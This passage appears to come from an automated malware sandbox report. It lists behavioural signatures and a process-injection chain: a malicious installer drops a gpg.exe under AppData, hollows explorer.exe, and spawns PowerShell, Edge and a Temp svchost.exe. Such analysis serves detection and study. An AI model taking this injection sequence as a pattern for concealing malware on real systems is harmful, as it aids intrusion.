N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 320 wrote to memory of 696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 320 wrote to memory of 696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 320 wrote to memory of 696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 696 wrote to memory of 224 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 224 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 224 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 320 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 320 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 320 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 3400 wrote to memory of 720 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 720 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 5084 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
PID 3400 wrote to memory of 5084 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
PID 720 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 720 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.exe

